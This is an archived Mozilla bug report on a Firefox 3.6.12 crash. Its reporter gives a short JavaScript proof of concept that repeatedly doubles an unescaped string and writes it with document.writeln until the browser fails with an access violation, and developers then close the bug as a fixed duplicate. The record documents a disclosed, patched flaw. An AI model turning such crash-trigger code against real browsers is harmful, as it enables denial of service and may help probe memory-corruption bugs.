Closed
Bug 610102
Opened 15 years ago
Closed 15 years ago
Crash using document.writeln [Access violation]
Categories
(Core :: General, defect)
Tracking
()
RESOLVED
FIXED
People
(Reporter: jordi.chancel, Unassigned)
References
Details
(Whiteboard: [sg:dupe 608336])
Attachments
(2 files)
Access Violation when reading [00000008]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
I found that 00000008 was written to the call stack.
PoC :
<body onload="javascript:crash();"></body>
<script>
function crash() {
var string1 = unescape("%u4141%u0000");
for (i =0;i<100000;i++) {
string1+=string1+string1;
document.writeln(string1+string1);
}
}
</script>
Reproducible: Always
Actual Results:
Mozilla Firefox is crached
Tested on Windows 7
|
Reporter | |
Comment 1•15 years ago
|
||
|
|
Reporter | |
Comment 2•15 years ago
|
||
|
|
Reporter | |
Updated•15 years ago
|
Component: Security → General
|
||
Updated•15 years ago
|
QA Contact: toolkit → general
Summary: Crash using document.writeln [Acess violation] → Crash using document.writeln [Access violation]
|
||
Comment 3•15 years ago
|
||
Thanks for your report, it's most likely a duplicate of bug 608336.
|
||
Updated•15 years ago
|
Whiteboard: [sg:dupe 608336]
|
|
||
Comment 4•15 years ago
|
||
Jordi, can you verify it's fixed in the following 3.6.13 candidate build?
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.13-candidates/build2/
|
|
Reporter | |
Comment 5•15 years ago
|
||
Yes fixed.
|
|
||
Comment 6•15 years ago
|
||
Fixed by bug 608336.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
|
||
Updated•10 years ago
|
Group: core-security → core-security-release
|
|
||
Updated•10 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•